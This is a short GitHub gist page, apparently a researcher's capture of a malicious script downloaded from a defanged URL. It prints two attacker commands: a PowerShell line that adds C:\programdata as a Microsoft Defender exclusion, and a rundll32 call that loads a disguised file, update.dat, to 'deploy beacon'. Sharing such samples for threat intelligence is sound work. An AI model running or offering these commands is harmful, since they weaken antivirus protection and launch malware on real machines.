Skip to content

Instantly share code, notes, and snippets.

@Purp1eW0lf
Created February 23, 2024 16:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Purp1eW0lf/3a093a41d8ea32531e5b11006c54a70d to your computer and use it in GitHub Desktop.
Save Purp1eW0lf/3a093a41d8ea32531e5b11006c54a70d to your computer and use it in GitHub Desktop.
# Downloaded from hxxp[://]minish[.]wiki[.]gd/c[.]pdf
#Exclude directory in Defender
powershell.exe Add-MpPreference -ExclusionPath C:\\programdata -Force
#Deploy beacon
rundll32.exe c:\\programdata\\update.dat UpdateSystem
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment